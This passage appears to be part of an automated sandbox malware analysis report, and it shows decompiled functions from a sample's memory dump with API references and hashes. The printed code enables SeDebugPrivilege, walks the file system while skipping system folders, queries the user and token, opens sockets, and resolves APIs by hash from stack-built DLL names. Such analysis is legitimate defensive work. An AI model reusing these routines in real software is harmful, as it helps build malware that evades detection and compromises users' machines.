							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
Windows, xrefs: 00403DEA
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				void* _t41;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
									_t67 = _t41;
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062ec
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
